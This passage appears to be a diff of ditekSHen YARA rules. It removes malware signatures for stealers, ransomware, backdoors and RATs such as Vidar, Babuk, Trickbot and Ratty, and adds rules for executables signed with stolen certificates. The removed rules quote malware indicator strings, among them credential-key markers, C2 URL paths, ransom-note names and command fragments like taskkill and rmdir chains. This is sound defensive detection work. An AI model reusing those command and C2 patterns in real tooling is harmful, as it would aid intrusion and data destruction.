-		$s8 = "recursive_directory_iterator" ascii
-		$s9 = { 2e 7a 69 70 00 00 00 00 2e 7a 6f 6f 00 00 00 00
-                2e 61 72 63 00 00 00 00 2e 6c 7a 68 00 00 00 00
-                2e 61 72 6a 00 00 00 00 2e 67 7a 00 2e 74 67 7a
-                00 00 00 00 }
-		$s10 = "Shurk Steal" fullword ascii
-		$s11 = ":memory:" fullword ascii
-		$s12 = "current_path()" fullword ascii
-		$s13 = "vtab:%p:%p" fullword ascii
-		$f1 = "chatlog.txt" ascii
-		$f2 = "servers.fav" ascii
-		$f3 = "\\USERDATA.DAT" fullword ascii
+		thumbprint = "ea017224c3b209abf53941cc4110e93af7ecc7b1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $s* ) and 2 of ( $f* ) ) or ( all of ( $f* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atomic Protocol Systems" and pe.signatures [ i ] . serial == "0b:2b:19:26:57:b3:76:32:51:8b:08:a0:6e:20:13:81" )
 }
-rule DITEKSHEN_MALWARE_Win_Vidar : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00945Aaac27E7D6D810C0A542Bedd562A4 : FILE
 {
 	meta:
-		description = "Detects Vidar / ArkeiStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d858c463-26d7-5f96-ad9a-cb261a8c61c6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5698130c-0696-5474-8b86-b6ba290d2822"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3640-L3650"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6957-L6972"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c95c8694c05ff0e8d28f098e668a8ae8fa70130e31af6c0e540c4e5596007e41"
+		logic_hash = "292657717cb42835324b6ff42d563bca47e042e82afef24b5d666b16979b8103"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii
-		$s2 = "screenshot.jpg" fullword wide
-		$s3 = "Content-Disposition: form-data; name=\"" ascii
+		thumbprint = "de7794505df4aeb1253500617e812f462592e163"
+		hash1 = "df3dabd031184b67bab7043baaae17061c21939d725e751c0a6f6b7867d0cf34"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DYNAMX BUSINESS GROUP LTD." and ( pe.signatures [ i ] . serial == "94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" or pe.signatures [ i ] . serial == "00:94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Babuk : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6D450Cc59Acdb4B7 : FILE
 {
 	meta:
-		description = "Detects Babuk ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6bb7093f-bbef-5b43-b4f9-be72ae4ef319"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "845e3f48-5660-525e-bd18-5953c64322f1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3652-L3674"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6974-L6985"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5ca5c5106747cf8f4ccd5df4ddbc78321fea3c8f533cb807a704d270eb956007"
+		logic_hash = "8328159dce3586c26b777f92d7a87e0660520cf08d122505d34ed427bdd7ff6f"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ecdh_pub_k.bin" wide
-		$s2 = "How To Restore Your Files.txt" wide
-		$s3 = /(babuk|babyk)\s(ransomware|locker)/ ascii nocase
-		$s4 = "/login.php?id=" ascii
-		$s5 = "http://babuk" ascii
-		$s6 = "bootsect.bak" fullword wide
-		$s7 = "Can't open file after killHolder" ascii
-		$s8 = "Can't OpenProcess" ascii
-		$s9 = "DoYouWantToHaveSexWithCuongDong" ascii
-		$arg1 = "-lanfirst" fullword ascii
-		$arg2 = "-lansecond" fullword ascii
-		$arg3 = "-nolan" fullword ascii
-		$arg4 = "shares" fullword wide
-		$arg5 = "paths" fullword wide
-		$arg6 = "gdebug" fullword wide
+		thumbprint = "bd3ac678cabb6465854880dd06b7b6cd231def89"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( 3 of ( $arg* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CancellationTokenSource" and pe.signatures [ i ] . serial == "6d:45:0c:c5:9a:cd:b4:b7" )
 }
-rule DITEKSHEN_MALWARE_Win_Nitol : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_66390Fc17786D4A342F0Ee89996D6522 : FILE
 {
 	meta:
-		description = "Detects Nitol backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d545f826-11ff-5d0f-9a95-8232b19d35b6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "202e4270-9b49-5516-8188-a64bd528a9c4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3676-L3704"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6987-L6998"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c0ddcd6179bea2f3af77ae198e07f55f62884e07a975623ae41bcec163060f89"
+		logic_hash = "a38d09beee8ddaa6e8273e04fe3c5cc9ff9a4e55344e2b9191bb3e5928e9e79b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%$#@!.aspGET ^&*().htmlGET" ascii
-		$s2 = "Applications\\iexplore.exe\\shell\\open\\command" fullword ascii
-		$s3 = "taskkill /f /im rundll32.exe" fullword ascii
-		$s4 = "\\Tencent\\Users\\*.*" fullword ascii
-		$s5 = "[Pause Break]" fullword ascii
-		$s6 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
-		$s7 = "GET %s HTTP/1.1" fullword ascii
-		$s8 = "GET %s%s HTTP/1.1" fullword ascii
-		$s9 = "Accept-Language: zh-cn" fullword ascii
-		$s10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" fullword ascii
-		$s11 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$s12 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$w1 = ".aspGET" ascii
-		$w2 = ".htmGET" ascii
-		$w3 = ".htmlGET" ascii
-		$domain = "www.xy999.com" fullword ascii
-		$v2_1 = "loglass" fullword ascii
-		$v2_2 = "rlehgs" fullword ascii
-		$v2_3 = "eherrali" fullword ascii
-		$v2_4 = "agesrlu" fullword ascii
-		$v2_5 = "lepejagas" fullword ascii
+		thumbprint = "80e8620ff16598cc1e157a2b7df17d528b03b6e5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $v2* ) ) or ( $domain and 3 of them ) or ( #w1 > 2 and #w2 > 2 and #w3 > 2 and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logitech Z-" and pe.signatures [ i ] . serial == "66:39:0f:c1:77:86:d4:a3:42:f0:ee:89:99:6d:65:22" )
 }
-rule DITEKSHEN_MALWARE_Win_Strongpity : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D1737E5A94D2Aff121163Df177Ed7Cf7 : FILE
 {
 	meta:
-		description = "Detects StrongPity"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9dcc5edb-5c86-5412-af63-f88d488d5829"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "92ba22ba-9610-5b9b-9075-1da84fb148c1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3706-L3720"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7000-L7015"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e92147966cd68152eb536b805c4918462f72f64280d1b3df800bb41266aa232f"
+		logic_hash = "7889e42ca0bc6c4aad0c7cf90459958e9d256b984fae719bd418fc17120cb4a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Boundary%08X" ascii wide
-		$s2 = "Content-Disposition: form-data; name=\"file\";" fullword ascii
-		$s3 = "%sfilename=\"%ls\"" fullword ascii
-		$s4 = "name=%ls&delete=" fullword ascii
-		$s5 = "Content-Type: application/octet-stream" fullword ascii
-		$s6 = "cmd.exe /C ping" wide
-		$s7 = "& rmdir /Q /S \"" wide
+		thumbprint = "ed2e4f72e8cb9b008a28b31de440f024381e4c8d"
+		hash1 = "66dfb7c408d734edc2967d50244babae27e4268ea93aa0daa5e6bbace607024c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BedstSammen ApS" and ( pe.signatures [ i ] . serial == "d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" or pe.signatures [ i ] . serial == "00:d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Jssloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Aa94583A95D42F1 : FILE
 {
 	meta:
-		description = "Detects JSSLoader RAT/backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ef710c21-5c64-513e-b882-b5768478976e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a77e58c7-c613-5416-9bcd-336c036d99bd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3722-L3752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7017-L7028"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "91764dabfb40cb51914110de229ddb00cd565078fef83c825f7a86fa502fda37"
+		logic_hash = "174ce032fd87028e34843417d5a4695d6d6e2eb444095e005588f1acf291cdf8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$cmd1 = "Cmd_UPDATE" fullword ascii
-		$cmd2 = "Cmd_IDLE" fullword ascii
-		$cmd3 = "Cmd_EXE" fullword ascii
-		$cmd4 = "Cmd_VBS" fullword ascii
-		$cmd5 = "Cmd_JS" fullword ascii
-		$cmd6 = "Cmd_PWS" fullword ascii
-		$cmd7 = "Cmd_RAT" fullword ascii
-		$cmd8 = "Cmd_UNINST" fullword ascii
-		$cmd9 = "Cmd_RunDll" fullword ascii
-		$s1 = "ANSWER_OK" fullword ascii
-		$s2 = "GatherDFiles" ascii
-		$s3 = "CommandCd" fullword ascii
-		$s4 = "URL_GetCmd" fullword ascii
-		$s5 = "\"host\": \"{0}\", \"domain\": \"{1}\", \"user\": \"{2}\"" wide
-		$s6 = "pc_dns_host_name" wide
-		$s7 = "\"adinfo\": { \"adinformation\":" wide
-		$e1 = "//e:vbscript" wide
-		$e2 = "//e:jscript" wide
-		$e3 = "/c rundll32.exe" wide
-		$e4 = "/C powershell" wide
-		$e5 = "C:\\Windows\\System32\\cmd.exe" wide
-		$e6 = "echo del /f" wide
-		$e7 = "AT.U() {0}. format" wide
+		thumbprint = "0b27715d7c78368bca3ac0bb829a7ceb19b3b5c3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $cmd* ) or 5 of ( $s* ) or all of ( $e* ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UInt32" and pe.signatures [ i ] . serial == "5a:a9:45:83:a9:5d:42:f1" )
 }
-rule DITEKSHEN_MALWARE_Win_CHUWI_Seth : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Ce7A0C62F27Fa98F78853E1Ad11173F : FILE
 {
 	meta:
-		description = "First sighting on 2020-01-05 didn't include ransomware artificats. Second sighting on 2020-01-24 with several correlations between the two samples now include ransomware artifacts."
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "62af3cd3-59c3-580b-9d66-71fd4acfaf17"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "dd6ba685-deac-5ba0-8268-2ff17f3efc5a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3754-L3801"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7030-L7041"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e6e3f5e9af093268667f67fec2176a943b35721e9f220804e176c6b5a3bb24e1"
+		logic_hash = "48692213d57293d28d0eb146d24036fa7e7357e55df07330d596a51a0665f063"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920103-920105"
-		snort3_sid = "920101-920103"
-
-	strings:
-		$cmd1 = "shell_command" fullword ascii
-		$cmd2 = "check_command" fullword ascii
-		$cmd3 = "down_exec" fullword ascii
-		$cmd4 = "open_link" fullword ascii
-		$cmd5 = "down_exec" fullword ascii
-		$cmd6 = "exe_link" fullword ascii
-		$cmd7 = "shellCommand" fullword ascii
-		$cmd8 = "R_CMMAND" fullword ascii
-		$cnc1 = "/check_command.php?HWID=" ascii
-		$cnc2 = "&act=get_command" ascii
-		$cnc3 = "/get_command.php?hwid=" ascii
-		$cnc4 = "&command=down_exec" ascii
-		$cnc5 = "&command=message" ascii
-		$cnc6 = "&command=open_link" ascii
-		$cnc7 = "&command=down_exec" ascii
-		$cnc8 = "&command=shell" ascii
-		$pdb = "\\Users\\CHUWI\\Documents\\CPROJ\\Downloader\\svchost" ascii
-		$rcnc1 = "inc/check_command.php" ascii
-		$rcnc2 = "inc/get_command.php" ascii
-		$rcnc3 = "php?btc" ascii
-		$rcnc4 = "php?hwid" ascii
-		$x1 = "> %USERPROFILE%\\Desktop\\HOW_DECRYPT_FILES.seth.txt" ascii
-		$x2 = "/C dir /b %USERPROFILE%\\Documents > %temp%\\doc.txt" ascii
-		$x3 = "/C dir /b %USERPROFILE%\\Desktop > %temp%\\desk.txt" ascii
-		$x4 = "/C dir /b %USERPROFILE%\\Downloads > %temp%\\downs.txt" ascii
-		$x5 = "/C dir /b %USERPROFILE%\\Pictures > %temp%\\pics.txt" ascii
-		$x6 = "for /F \"delims=\" %%a in ('mshta.exe \"%~F0\"') do set \"HTA=%%a\"" ascii
-		$x7 = "\\svchost.exe" fullword ascii
-		$x8 = ".seth" fullword ascii
-		$x9 = "MyAgent" fullword ascii
+		thumbprint = "638dc7cd59f1d634c19e4fc2c41b38ae08a1d2e5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $pdb or 5 of ( $cmd* ) or 4 of ( $cnc* ) or all of ( $rcnc* ) or 5 of ( $x* ) or 8 of them )
+		( uint16( 0 ) == 0x5a4d or uint32( 0 ) == 0xe011cfd0 ) and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D&K ENGINEERING" and pe.signatures [ i ] . serial == "6c:e7:a0:c6:2f:27:fa:98:f7:88:53:e1:ad:11:17:3f" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Gulpix : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_670C3494206B9F0C18714Fdcffaaa42F : FILE
 {
 	meta:
-		description = "Detects Gulpix/HyperPlus backddor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b3dfd1d9-42fe-57d4-8047-135103689be7"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "cbe10923-794e-50f0-bcc7-026ca2235836"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3803-L3832"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7043-L7054"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5026726f093b31b444fc934ac1446b6c25f182b8714a37da05f4498f32a9a65f"
+		logic_hash = "5215f3e877ac4b37d33a29f9d2e92567db02f41f5fa1592d2de199ee06b43885"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "MainServer.dll" fullword ascii
-		$x2 = "NvSmartMax.dat" fullword wide
-		$x3 = "NvSmartMax.dll" fullword wide
-		$x4 = "http://+:80/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7/" fullword wide
-		$s1 = "IP retriever" fullword wide
-		$s2 = "\\cmd.exe" fullword wide
-		$s3 = "\\msnetwork-cache.db" fullword wide
-		$s4 = "http://+:" wide
-		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" fullword wide
-		$s6 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii
-		$s7 = "Got a unknown request for %ws" wide
-		$s8 = "HttpReceiveRequestEntityBody failed with %lu" wide
-		$s9 = "FD873AC4-CF86-4FED-84EC-4BD59C6F17A7" wide
+		thumbprint = "59612473a9e23dc770f3a33b1ef83c02e3cfd4b6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 6 of ( $s* ) or ( 2 of ( $x* ) and 4 of ( $s* ) ) or ( 2 of them and pe.exports ( "daemon" ) and pe.exports ( "run" ) and pe.exports ( "session" ) and pe.exports ( "work" ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" )
 }
-rule DITEKSHEN_MALWARE_Linux_Ransomexx : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5F11C47D3F8C468E5D38279De98078Ce : FILE
 {
 	meta:
-		description = "Detects RansomEXX ransomware"
-		author = "ditekshen"
-		id = "b449afc7-9055-55ed-a876-316d1aea8fee"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "d7ec5ceb-df6d-518c-977d-84ab2a40f6ed"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3834-L3858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7056-L7067"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c233ccc3e741cb2c53f182c48093e41595a82a3f4e5bdb1dc0204f1f57b96c2a"
+		logic_hash = "82db6d0b96303be79aa9a0980a4ce491a1216adbba65443e8e59c5cf69a4a1e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Linux.Ransomware.RansomEXX"
-
-	strings:
-		$c1 = "crtstuff.c" fullword ascii
-		$c2 = "cryptor.c" fullword ascii
-		$c3 = "ransomware.c" fullword ascii
-		$c4 = "logic.c" fullword ascii
-		$c5 = "enum_files.c" fullword ascii
-		$c6 = "readme.c" fullword ascii
-		$c7 = "ctr_drbg.c" fullword ascii
-		$s1 = "regenerate_pre_data" fullword ascii
-		$s2 = "g_RansomHeader" fullword ascii
-		$s3 = "CryptOneBlock" fullword ascii
-		$s4 = "RansomLogic" fullword ascii
-		$s5 = "CryptOneFile" fullword ascii
-		$s6 = "encrypt_worker" fullword ascii
-		$s7 = "list_dir" fullword ascii
-		$s8 = "ctr_drbg_update_internal" fullword ascii
+		thumbprint = "29bbee51837dbc00c8e949ff2c0226d4bbb3722c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 5 of ( $c* ) or 6 of ( $s* ) or ( 3 of ( $c* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atera Networks LTD." and pe.signatures [ i ] . serial == "5f:11:c4:7d:3f:8c:46:8e:5d:38:27:9d:e9:80:78:ce" )
 }
-rule DITEKSHEN_MALWARE_Win_Trickbotmodule : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bdb99D5Ecf8271D48E35F1039C2160Ef : FILE
 {
 	meta:
-		description = "Detects Trickbot modules"
-		author = "ditekshen"
-		id = "c56c664f-5928-5e2e-ab06-0b9d504981be"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "a87a3295-fbdb-5501-97a1-7cb23009f925"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3860-L3881"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7069-L7083"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d06653dad5f8a18598855212548364b3c3d2b68b99784846b494fcb1d1c8df9"
+		logic_hash = "3a7fd1705d440306e7643167f46b0735bedab291e714cd01068be321f489e3f3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$mc = "<moduleconfig>" ascii
-		$s1 = "<autostart>" ascii
-		$s2 = "<nohead>" ascii
-		$s3 = "<needinfo" ascii
-		$s4 = "<conf ctl" ascii
-		$s5 = "<limit>" ascii
-		$w1 = "<sys>yes</sys>" ascii
-		$w2 = "<sys>no</sys>" ascii
-		$w3 = "<autostart>yes</autostart>" ascii
-		$w4 = "<autostart>no</autostart>" ascii
-		$w5 = "<nohead>yes</nohead>" ascii
-		$w6 = "<nohead>no</nohead>" ascii
-		$w7 = /<limit>\d+<\/limit>/ ascii
-		$w8 = "<moduleconfig> </moduleconfig" ascii
+		thumbprint = "331f96a1a187723eaa5b72c9d0115c1c57f08b66"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $mc and ( 2 of ( $s* ) or ( 1 of ( $s* ) and 1 of ( $w* ) ) or 1 of ( $w* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gavrilov Andrei Alekseevich" and ( pe.signatures [ i ] . serial == "bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" or pe.signatures [ i ] . serial == "00:bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Gaudox : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_025020668F51235E9Ecfff8Cf00Da63E : FILE
 {
 	meta:
-		description = "Detects Gaudox RAT"
-		author = "ditekshen"
-		id = "c60ac433-20a1-5f01-9447-fa99621bd9e2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "5b9af281-09b0-5df5-af3b-4868a7243636"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3883-L3893"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7085-L7096"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "117ee89e264067ab3e695688872bbe7d83963731e877d04ac7e2505e64f6e793"
+		logic_hash = "c99caf6ada228fe1229ea8e8ca0b160468f044a9a1e13ed9a83c12afeae337a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "hdr=%s&tid;=%s&cid;=%s&trs;=%i" ascii wide
-		$s2 = "\\\\\\\\.\\\\PhysicalDrive%u" ascii wide
+		thumbprint = "59f82837fa672a81841d8fa4d3ba290395c10200"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Knassar DK ApS" and pe.signatures [ i ] . serial == "02:50:20:66:8f:51:23:5e:9e:cf:ff:8c:f0:0d:a6:3e" )
 }
-rule DITEKSHEN_MALWARE_Win_Ratty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Cfae7E6F538B9F2E : FILE
 {
 	meta:
-		description = "Detects Ratty Java RAT"
-		author = "ditekshen"
-		id = "87719e28-dfe7-5366-8d90-65e6c0c6fb4f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "c144fe64-ad45-5ac6-b2ee-904a66230674"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3910-L3929"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7098-L7112"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d90bca1b18023da8e60cb6ca86d1c562bff3867c6d5cf893dce605ebb92b9637"
+		logic_hash = "23032d387bbfc81edb08982a196b90a136faf935d74c46771c59ef19095ac3a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/rat/RattyClient.class" ascii
-		$s2 = "/rat/ActiveConnection.class" ascii
-		$s3 = "/rat/attack/" ascii
-		$s4 = "/rat/gui/swing/Ratty" ascii
-		$s5 = "/rat/packet/PasswordPacket" ascii
-		$s6 = "/rat/packet/" ascii
-		$e1 = "/engine/Keyboard.class" ascii
-		$e2 = "/engine/IMouseListener.class" ascii
-		$e3 = "/engine/Screen$ResizeBehavior.class" ascii
-		$e4 = "/engine/fx/ISoundListener.class" ascii
-		$e5 = "/engine/net/TCPServer.class" ascii
-		$e6 = "/engine/noise/PerlinNoise.class" ascii
+		thumbprint = "3152fc5298e42de08ed2dec23d8fefcaa531c771"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x4b50 ) and ( 3 of ( $s* ) or all of ( $e* ) )
